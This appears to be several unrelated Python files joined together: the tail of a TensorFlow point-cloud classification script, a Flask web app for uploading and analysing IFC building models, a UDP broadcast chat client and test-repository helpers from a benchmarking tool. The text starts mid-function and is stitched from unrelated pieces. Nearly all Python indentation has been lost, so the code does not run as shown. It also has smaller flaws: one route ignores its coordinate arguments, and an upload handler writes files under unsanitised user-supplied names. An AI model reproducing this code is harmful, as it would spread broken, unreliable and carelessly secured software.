if FLAGS.input_type is InputType.TXT:
files = glob.glob(os.path.join(FLAGS.input_path,"*.txt"))
elif FLAGS.input_type is InputType.LAS:
files = glob.glob(os.path.join(FLAGS.input_path,"*.las"))
# Setup queues
input_queue = Queue(maxsize=3)
output_queue = Queue(maxsize=3)
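    # Work flows pre_processor -> main_processor -> post_processor over bounded
    # queues; a None item is the sentinel that tells the consumer to shut down.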
    # Note: this threading implementation could be set up more efficiently, but it's about 2x faster than a non-threaded version.
logging.info('Starting threads')
pre_proc = threading.Thread(target=pre_processor,name='Pre-ProcThread',args=(sorted(files),input_queue))
pre_proc.start()
main_proc = threading.Thread(target=main_processor,name='MainProcThread',args=(input_queue,output_queue))
main_proc.start()
post_proc = threading.Thread(target=post_processor,name='PostProcThread',args=(output_queue,))
post_proc.start()
logging.debug('Waiting for threads to finish')
pre_proc.join()
logging.debug('Joined pre-processing thread')
main_proc.join()
logging.debug('Joined main processing thread')
post_proc.join()
logging.debug('Joined post-processing thread')
logging.info('Done')
def prep_pset(pset):
data64 = np.stack([pset.x,pset.y,pset.z,pset.i,pset.r],axis=1)
offsets = np.mean(data64[:,COLUMNS],axis=0)
data = (data64[:,COLUMNS]-offsets).astype('float32')
n = len(pset.x)
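    # Sample exactly NUM_POINT points: without replacement when the point set is
    # larger than needed, with replacement when it is smaller.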
if NUM_POINT < n:
ixs = np.random.choice(n,NUM_POINT,replace=False)
elif NUM_POINT == n:
ixs = np.arange(NUM_POINT)
else:
ixs = np.random.choice(n,NUM_POINT,replace=True)
return data64[ixs,:], data[ixs,:] / SCALE[COLUMNS]
def get_batch(dataset, start_idx, end_idx):
bsize = end_idx-start_idx
rsize = min(end_idx,len(dataset))-start_idx
batch_raw = np.zeros((rsize, NUM_POINT, 5), dtype=np.float64)
batch_data = np.zeros((bsize, NUM_POINT, NUM_DIMENSIONS), dtype=np.float32)
for i in range(rsize):
pset = dataset[start_idx+i]
batch_raw[i,...], batch_data[i,...] = prep_pset(pset)
return batch_raw, batch_data
def pre_processor(files, input_queue):
for file in files:
logging.info('Loading {}'.format(file))
pset = PointSet(file)
psets = pset.split()
num_batches = int(math.ceil((1.0*len(psets))/BATCH_SIZE))
data = []
for batch_idx in range(num_batches):
start_idx = batch_idx * BATCH_SIZE
end_idx = (batch_idx+1) * BATCH_SIZE
for k in range(FLAGS.n_angles):
batch_raw, batch_data = get_batch(psets, start_idx, end_idx)
if k == 0:
aug_data = batch_data
else:
ang = (1.0*k)/(1.0*FLAGS.n_angles) * 2 * np.pi
if FLAGS.extra_dims:
aug_data = np.concatenate((provider.rotate_point_cloud_z(batch_data[:,:,0:3],angle=ang),
batch_data[:,:,3:]),axis=2)
else:
aug_data = provider.rotate_point_cloud_z(batch_data)
data.append((batch_raw,aug_data))
logging.debug('Adding {} to queue'.format(file))
input_queue.put((pset,data))
logging.debug('Added {} to queue'.format(file))
logging.info('Pre-processing finished')
input_queue.put(None)
logging.debug('Pre-processing thread finished')
def main_processor(input_queue, output_queue):
with tf.Graph().as_default():
with tf.device('/device:GPU:'+str(GPU_INDEX)):
pointclouds_pl, labels_pl, smpws_pl = MODEL.placeholder_inputs(BATCH_SIZE, NUM_POINT)
is_training_pl = tf.placeholder(tf.bool, shape=())
logging.info("Loading model")
pred, end_points = MODEL.get_model(pointclouds_pl, is_training_pl, NUM_CLASSES)
saver = tf.train.Saver()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
sess = tf.Session(config=config)
# Restore variables from disk.
saver.restore(sess, MODEL_PATH)
ops = {'pointclouds_pl': pointclouds_pl,
'is_training_pl': is_training_pl,
'pred': pred}
is_training = False
logging.info("Model loaded")
while True:
in_data = input_queue.get()
if in_data is None:
break
logging.info('Processing {}'.format(in_data[0].filename))
batch_list = in_data[1]
for k in range(len(batch_list)):
batch_raw = batch_list[k][0]
aug_data = batch_list[k][1]
feed_dict = {ops['pointclouds_pl']: aug_data,
ops['is_training_pl']: is_training}
pred_val = sess.run([ops['pred']], feed_dict=feed_dict)
pred_labels = np.argmax(pred_val[0], 2) # BxN
# subset to true batch size as necessary
if batch_raw.shape[0] != BATCH_SIZE:
pred_labels = pred_labels[0:batch_raw.shape[0],:]
# Reshape pred_labels and batch_raw to (BxN,1) and (BxN,5) respectively (i.e. concatenate all point sets in batch together)
pred_labels.shape = (pred_labels.shape[0]*pred_labels.shape[1])
batch_raw.shape = (batch_raw.shape[0]*batch_raw.shape[1],batch_raw.shape[2])
if k==0:
all_labels = pred_labels
all_points = batch_raw
else:
# Concatenate all pointsets across all batches together
all_labels = np.concatenate((all_labels,pred_labels),axis=0)
all_points = np.concatenate((all_points,batch_raw),axis=0)
logging.debug('Adding {} to output queue'.format(in_data[0].filename))
output_queue.put((in_data[0],all_points,all_labels))
logging.debug('Added {} to output queue'.format(in_data[0].filename))
input_queue.task_done()
logging.info('Main processing finished')
output_queue.put(None)
logging.debug('Main processing thread finished')
def post_processor(output_queue):
while True:
out_data = output_queue.get()
if out_data is None:
break
pset = out_data[0]
all_points = out_data[1]
all_labels = out_data[2]
logging.info('Post-processing {}'.format(pset.filename))
with tempfile.TemporaryDirectory() as tmpdir:
# Save pset to temp file
ipath = os.path.join(tmpdir,pset.filename+'_original.las')
pset.save(ipath)
# Update pset points
pset.x = all_points[:,0]
pset.y = all_points[:,1]
pset.z = all_points[:,2]
pset.i = all_points[:,3]
pset.r = all_points[:,4]
pset.c = np.array([LABEL_MAP[v] for v in all_labels],dtype='uint8')
# Save all classed points to a new file
cpath = os.path.join(tmpdir,pset.filename+'_candidates.las')
pset.save(cpath)
if FLAGS.output_type is OutputType.LABELS:
opath = os.path.join(tmpdir,pset.filename+'.las')
else:
opath = os.path.join(FLAGS.output_path,pset.filename+'.las')
# Run nearest neighbor voting algorithm to classify original points (pdal pipeline):
pipeline = {'pipeline':[
ipath,
{'type':'filters.neighborclassifier','k':FLAGS.n_angles*4+1,'candidate':cpath}, # Note: number of votes is FLAGS.n_angles*4+1, where 4 comes from splitting the point cloud (nominal number of overlapping subtiles per point before rotations)
opath]}
p = subprocess.run(['/opt/conda/envs/cpdal-run/bin/pdal','pipeline','-s'],input=json.dumps(pipeline).encode())
if p.returncode:
raise ValueError('Failed to run pipeline: \n"'+json.dumps(pipeline)+'"')
            if FLAGS.output_type is not OutputType.LAS:
# Load in updated point cloud, save classification file
pset2 = PointSet(opath)
pset2.save_classifications_txt(os.path.join(FLAGS.output_path,pset.filename+'_CLS.txt'))
output_queue.task_done()
logging.debug('Finished {}'.format(pset.filename))
logging.debug('Post-processing thread finished')
if __name__ == "__main__":
inference()
|
main.py
|
##################################################################################
# #
# Copyright (c) 2020 AECgeeks #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# #
##################################################################################
from __future__ import print_function
import os
import json
import threading
import logging
import shutil
from collections import namedtuple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.datastructures import FileStorage
from flask import Flask, request, send_file, render_template, abort, jsonify, redirect, url_for, make_response
from flask_cors import CORS
from flasgger import Swagger
import utils
import worker
import database
import GEOBIM_Tool as geobim
application = Flask(__name__)
DEVELOPMENT = os.environ.get('environment', 'production').lower() == 'development'
if not DEVELOPMENT and os.path.exists("/version"):
PIPELINE_POSTFIX = "." + open("/version").read().strip()
else:
PIPELINE_POSTFIX = ""
if not DEVELOPMENT:
# In some setups this proved to be necessary for url_for() to pick up HTTPS
application.wsgi_app = ProxyFix(application.wsgi_app, x_proto=1)
if os.environ.get("FLASK_ENV") == "development":
MODELS_PATH = "../models-preloaded/"
IDS_PATH = MODELS_PATH + "ids_development.json"
else:
MODELS_PATH = "./models-preloaded/"
IDS_PATH = MODELS_PATH + "ids_production.json"
CORS(application)
application.config['SWAGGER'] = {
'title': os.environ.get('APP_NAME', 'ifc-pipeline request API'),
'openapi': '3.0.2',
"specs": [
{
"version": "0.1",
"title": os.environ.get('APP_NAME', 'ifc-pipeline request API'),
"description": os.environ.get('APP_NAME', 'ifc-pipeline request API'),
"endpoint": "spec",
"route": "/apispec",
},
]
}
swagger = Swagger(application)
if not DEVELOPMENT:
from redis import Redis
from rq import Queue
q = Queue(connection=Redis(host=os.environ.get("REDIS_HOST", "localhost")), default_timeout=3600)
@application.route('/', methods=['GET'])
def get_main():
return render_template('index.html')
def process_upload(filewriter, callback_url=None):
id = utils.generate_id()
d = utils.storage_dir_for_id(id)
os.makedirs(d)
filewriter(os.path.join(d, id + ".ifc"))
session = database.Session()
session.add(database.model(id, ''))
session.commit()
session.close()
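    # In development the conversion runs in a local thread; in production it is
    # handed off to the Redis-backed rq queue configured above.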
if DEVELOPMENT:
t = threading.Thread(target=lambda: worker.process(id, callback_url))
t.start()
else:
q.enqueue(worker.process, id, callback_url)
return id
def process_upload_multiple(files, callback_url=None):
id = utils.generate_id()
d = utils.storage_dir_for_id(id)
os.makedirs(d)
file_id = 0
paths = []
session = database.Session()
m = database.model(id, '')
session.add(m)
for file in files:
fn = file.filename
filewriter = lambda fn: file.save(fn)
path = os.path.join(d, id + "_" + str(file_id) + ".ifc")
filewriter(path)
paths.append(path)
file_id += 1
m.files.append(database.file(id, ''))
analyser = geobim.analyser()
analyser.load(path)
analysers[id] = analyser
session.commit()
session.close()
if DEVELOPMENT:
t = threading.Thread(target=lambda: worker.process(id, callback_url))
t.start()
else:
q.enqueue(worker.process, id, callback_url)
settings_path = IDS_PATH
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
settings[file.filename] = {}
settings[file.filename]["id"] = id
settings[file.filename]["path"] = paths[0]
os.remove(settings_path)
with open(settings_path, 'w') as f:
json.dump(settings, f)
return id
@application.route('/preloaded_models_info', methods=['GET'])
def preloaded_models_info():
with open(IDS_PATH, 'r') as f:
settings = json.load(f)
fns = list(settings.keys())
return jsonify(fns)
@application.route('/load_preloaded_file/<fn>', methods=['GET'])
def load_preloaded_file(fn):
ids_f = open(IDS_PATH)
ids = json.load(ids_f)
id = ids[fn]["id"]
return id
@application.route('/init_preloaded_files', methods=['GET'])
def init_preloaded_files():
if DEVELOPMENT:
t = threading.Thread(target=preload_files)
t.start()
else:
q.enqueue(preload_files)
return jsonify("success")
def preload_files():
path = MODELS_PATH
fns = [fn for fn in os.listdir(path) if os.path.isfile(os.path.join(path, fn))]
settings_path = path + "ids.json"
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
for fn in fns:
if fn[-4:] == ".ifc" and fn not in settings.keys():
f = open(path + fn, 'rb')
file = FileStorage(f)
id = process_upload_multiple([file])
d = utils.storage_dir_for_id(id)
f.close()
settings[fn] = {}
settings[fn]["id"] = id
settings[fn]["path"] = path + fn
os.remove(settings_path)
with open(settings_path, 'w') as f:
json.dump(settings, f)
def init_analyser(id):
global analysers
print("Init analyser, checking if exists...")
settings_path = IDS_PATH
with open(settings_path, "r") as settings_file:
settings = json.load(settings_file)
for model in settings:
if settings[model]["id"] == id:
print("Creating analyser for " + model)
analyser = geobim.analyser()
analyser.load(settings[model]["path"])
analysers[id] = analyser
print("Finished creating analyser for " + model)
def init_analysers():
global analysers
settings_path = IDS_PATH
f = open(settings_path, "r")
settings = json.load(f)
print(settings)
f.close()
for model in settings:
if settings[model]["id"] not in analysers:
print("Create analyser for " + model)
analyser = geobim.analyser()
analyser.load(settings[model]["path"])
analysers[settings[model]["id"]] = analyser
print("Finished creating analyser for " + model)
else:
print("Analyser for " + model + " already exists")
# @application.route('/init_all_analysers', methods=['GET'])
def init_all_analysers():
t = threading.Thread(target=init_analysers)
t.start()
"""
if DEVELOPMENT:
t = threading.Thread(target=init_analysers)
t.start()
else:
q.enqueue(init_analysers)
"""
# return jsonify("success")
@application.route('/upload_ifc', methods=['POST'])
def put_main():
"""
Upload model
---
requestBody:
content:
multipart/form-data:
schema:
type: object
properties:
ifc:
type: string
format: binary
responses:
'200':
description: redirect
"""
ids = []
files = []
for key, f in request.files.items():
if key.startswith('file'):
if f.filename[-4:] != ".ifc":
return "Invalid file", 400
files.append(f)
id = process_upload_multiple(files)
d = utils.storage_dir_for_id(id)
url = url_for('get_progress', id=id)
if request.accept_mimetypes.accept_json:
return jsonify({"url": url})
else:
return redirect(url)
@application.route('/p/<id>', methods=['GET'])
def check_viewer(id):
if not utils.validate_id(id):
abort(404)
return render_template('progress.html', id=id)
@application.route('/pp/<id>', methods=['GET'])
def get_progress(id):
if not utils.validate_id(id):
abort(404)
session = database.Session()
model = session.query(database.model).filter(database.model.code == id).all()[0]
session.close()
return jsonify({"progress": model.progress})
@application.route('/log/<id>.<ext>', methods=['GET'])
def get_log(id, ext):
log_entry_type = namedtuple('log_entry_type', ("level", "message", "instance", "product"))
if ext not in {'html', 'json'}:
abort(404)
if not utils.validate_id(id):
abort(404)
logfn = os.path.join(utils.storage_dir_for_id(id), "log.json")
if not os.path.exists(logfn):
abort(404)
if ext == 'html':
log = []
for ln in open(logfn):
l = ln.strip()
if l:
log.append(json.loads(l, object_hook=lambda d: log_entry_type(
*(d.get(k, '') for k in log_entry_type._fields))))
return render_template('log.html', id=id, log=log)
else:
return send_file(logfn, mimetype='text/plain')
@application.route('/v/<id>', methods=['GET'])
def get_viewer(id):
if not utils.validate_id(id):
abort(404)
d = utils.storage_dir_for_id(id)
ifc_files = [os.path.join(d, name) for name in os.listdir(d) if
os.path.isfile(os.path.join(d, name)) and name.endswith('.ifc')]
if len(ifc_files) == 0:
abort(404)
failedfn = os.path.join(utils.storage_dir_for_id(id), "failed")
if os.path.exists(failedfn):
return render_template('error.html', id=id)
for ifc_fn in ifc_files:
glbfn = ifc_fn.replace(".ifc", ".glb")
if not os.path.exists(glbfn):
abort(404)
n_files = len(ifc_files) if "_" in ifc_files[0] else None
return render_template(
'viewer.html',
id=id,
n_files=n_files,
postfix=PIPELINE_POSTFIX
)
@application.route('/m/<fn>', methods=['GET'])
def get_model(fn):
"""
Get model component
---
parameters:
- in: path
name: fn
required: true
schema:
type: string
description: Model id and part extension
example: BSESzzACOXGTedPLzNiNklHZjdJAxTGT.glb
"""
id, ext = fn.split('.', 1)
if not utils.validate_id(id):
abort(404)
if ext not in {"xml", "svg", "glb", "unoptimized.glb"}:
abort(404)
path = utils.storage_file_for_id(id, ext)
if not os.path.exists(path):
abort(404)
if os.path.exists(path + ".gz"):
import mimetypes
response = make_response(
send_file(path + ".gz",
mimetype=mimetypes.guess_type(fn, strict=False)[0])
)
response.headers['Content-Encoding'] = 'gzip'
return response
else:
return send_file(path)
@application.route('/analysis/<id>/wkt/<floornumber>', methods=['GET'])
def floor_wkt(id, floornumber):
result = analysers[id].footprintWKT(floornumber)
return jsonify({"wkt": result})
@application.route('/analysis/<id>/overhangsingle/<floornumber>', methods=['GET'])
def overhangsingle(id, floornumber):
result = analysers[id].OverhangOneFloor(floornumber)
return jsonify(result)
@application.route('/analysis/<id>/overhangall', methods=['GET'])
def overhangall(id):
result = analysers[id].OverhangAll_new()
return jsonify(result)
@application.route('/analysis/<id>/height', methods=['GET'])
def height(id):
result = analysers[id].GetHeight()
return result
@application.route('/analysis/<id>/baseheight/<floornumber>', methods=['GET'])
def baseheight(id, floornumber):
result = analysers[id].GetBaseHeight(floornumber)
return result
@application.route('/analysis/<id>/overlapsingle/<floornumber>', methods=['GET'])
def overlapsingle(id, floornumber):
result = analysers[id].OverlapOneFloor(floornumber)
return result
@application.route('/analysis/<id>/overlapall', methods=['GET'])
def overlapall(id):
result = analysers[id].OverlapAll()
return result
@application.route('/analysis/<id>/overlapsinglebbox/<floornumber>', methods=['GET'])
def overlapsinglebbox(id, floornumber):
result = analysers[id].OverlapOneFloorOBB(floornumber)
return result
@application.route('/analysis/<id>/overlapallbbox', methods=['GET'])
def overlapallbbox(id):
result = analysers[id].OverlapAllOBB()
return result
@application.route('/analysis/<id>/setbasefloornum/<floornumber>', methods=['GET'])
def setbasefloornum(id, floornumber):
analysers[id].setBaseFloornum(floornumber)
return "success"
@application.route('/analysis/<id>/addgeoreferencepoint/<x>/<y>/<z>', methods=['GET'])
def addgeoreferencepoint(id, x, y, z):
    analysers[id].setBaseFloornum()
    return "success"
@application.route('/analysis/<id>/setoverhangdir/<direction>', methods=['GET'])
def setoverhangdir(id, direction):
analysers[id].setOverhangdir(direction)
return "success"
@application.route('/analysis/<id>/setoverlapparameters/<s>/<dbscan>/<k>', methods=['GET'])
def setoverlapparameters(id, s, dbscan, k):
analysers[id].setOverlapParameters(s, dbscan, k)
return "success"
@application.route('/analysis/<id>/overhangroads/<floornum>/<guidelines>', methods=['GET'])
def overhangroads(id, floornum, guidelines):
guidelinesParsed = {}
for guideline in guidelines.split('|'):
entry = guideline.split(": ")
guidelinesParsed[entry[0]] = float(entry[1])
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if floornum != "none":
result = analysers[id].overhangRoads(guidelinesParsed, int(floornum))
else:
result = analysers[id].overhangRoads(guidelinesParsed)
return jsonify(result)
@application.route('/analysis/<id>/overhangroadsalphashape/<floornum>/<alpha>/<guidelines>', methods=['GET'])
def overhangroadsalphashape(id, floornum, alpha, guidelines):
alpha = float(alpha)
guidelinesParsed = {}
for guideline in guidelines.split('|'):
entry = guideline.split(": ")
guidelinesParsed[entry[0]] = float(entry[1])
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if floornum != "none":
result = analysers[id].overhangRoadsAlphaShape(guidelinesParsed, alpha, int(floornum))
else:
result = analysers[id].overhangRoadsAlphaShape(guidelinesParsed, alpha)
return jsonify(result)
@application.route('/analysis/<id>/heightcheck/<max>', methods=['GET'])
def heightcheck(id, max):
result = analysers[id].heightCheck(float(max))
return jsonify(result)
@application.route('/analysis/<id>/boundarycheck', methods=['GET'])
def boundarycheck(id):
result = analysers[id].boundaryCheck()
return jsonify(result)
@application.route('/analysis/<id>/getgeoref', methods=['GET'])
def getgeoref(id):
result = analysers[id].getGeoref()
    if result is not None:
return jsonify(result)
else:
return "No georeferencing information in IFC file", 400
@application.route('/analysis/<id>/parking/<zone>', methods=['POST', 'GET'])
def parking(id, zone):
ifc_path = None
ids = open(IDS_PATH, 'r')
settings = json.load(ids)
ids.close()
for k, v in settings.items():
if v["id"] == id:
ifc_path = v["path"]
break
if request.method == 'GET':
result = analysers[id].parkingCalculate(ifc_path, zone)
elif request.method == 'POST':
result = None
for key,f in request.files.items():
if key.startswith('file') and key.endswith('xlsx'):
print(f.filename)
fn = f.filename
p = os.path.join("/data/", fn)
f.save(p)
result = analysers[id].parkingCalculate(ifc_path, zone)
if result:
return result
else:
return "Error", 400
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
application.logger.handlers = gunicorn_logger.handlers
application.logger.setLevel(gunicorn_logger.level)
# Copy preloaded data to the correct folder because doing it directly in the Dockerfile doesn't work for some reason
if os.environ.get("FLASK_ENV") != "development":
shutil.copytree("/www/models-preloaded/G", "/data/G", dirs_exist_ok=True)
analysers = {}
init_all_analysers()
print("Initialising analysers done")
try:
import routes
except ImportError as e:
pass
|
udpBroadcast.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Main entrypoint for UDP chat test.
'''
'''
MIT License
Copyright (c) 2019 Simon Lövgren
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import argparse
import socket
import threading
import signal
globalStop = threading.Event()
class EchoClient():
def __init__( self, port ):
self.port = port
# Socket
self.socket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP )
self.socket.setsockopt( socket.SOL_SOCKET, socket.SO_BROADCAST, 1 )
self.socket.settimeout( 0.01 )
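        # A short receive timeout lets the receive thread poll the global stop
        # event instead of blocking forever in recvfrom().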
# Recv-thread
self.receive_thread = threading.Thread( target = self._receive_thread )
self.receive_thread.daemon = True
self.receive_thread.start()
def _receive_thread( self ):
while ( not globalStop.is_set() ):
try:
data, addr = self.socket.recvfrom( 2048 )
if ( len( data ) > 0 ):
print( f'-> {data}' )
except socket.timeout as e:
# Just a timeout
pass
except socket.error as e:
print( f'Socket error: [{e}]' )
def run( self ):
while( not globalStop.is_set() ):
try:
data = input()
self.socket.sendto( data.encode(), ( '<broadcast>', self.port ) )
except socket.error as e:
print( f'Socket error: [{e}]' )
except EOFError as e:
pass
'''
Command line stuff
'''
def killHandler( signum, stackFrame ):
print( f'Exiting.' )
# Signal kill event
globalStop.set()
def main( port ):
print( f'Sending to port {port}')
# Register SIGTERM and SIGINT handler
signal.signal( signal.SIGINT, killHandler )
signal.signal( signal.SIGTERM, killHandler )
client = EchoClient( port )
client.run()
def parseargs():
parser = argparse.ArgumentParser( description = 'UDP broadcast client.' )
# remote client to connect to
parser.add_argument(
'--port'
,action = 'store'
,metavar = '<port>'
,help = 'Port to broadcast to.'
,type = int
        ,default = 8000
)
return parser.parse_args()
if __name__ == "__main__":
args = parseargs()
main(
args.port
)
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""
This file contains utilities to generate test repositories.
"""
from __future__ import absolute_import, division, unicode_literals, print_function
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
from asv import util
from asv import commands
from asv import config
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
SIX_VERSION = "1.10"
COLORAMA_VERSIONS = ["0.3.7", "0.3.9"]
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
def run_asv(*argv):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
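        # Commits get strictly increasing fake dates (one second apart) so the
        # generated test history is deterministic.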
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
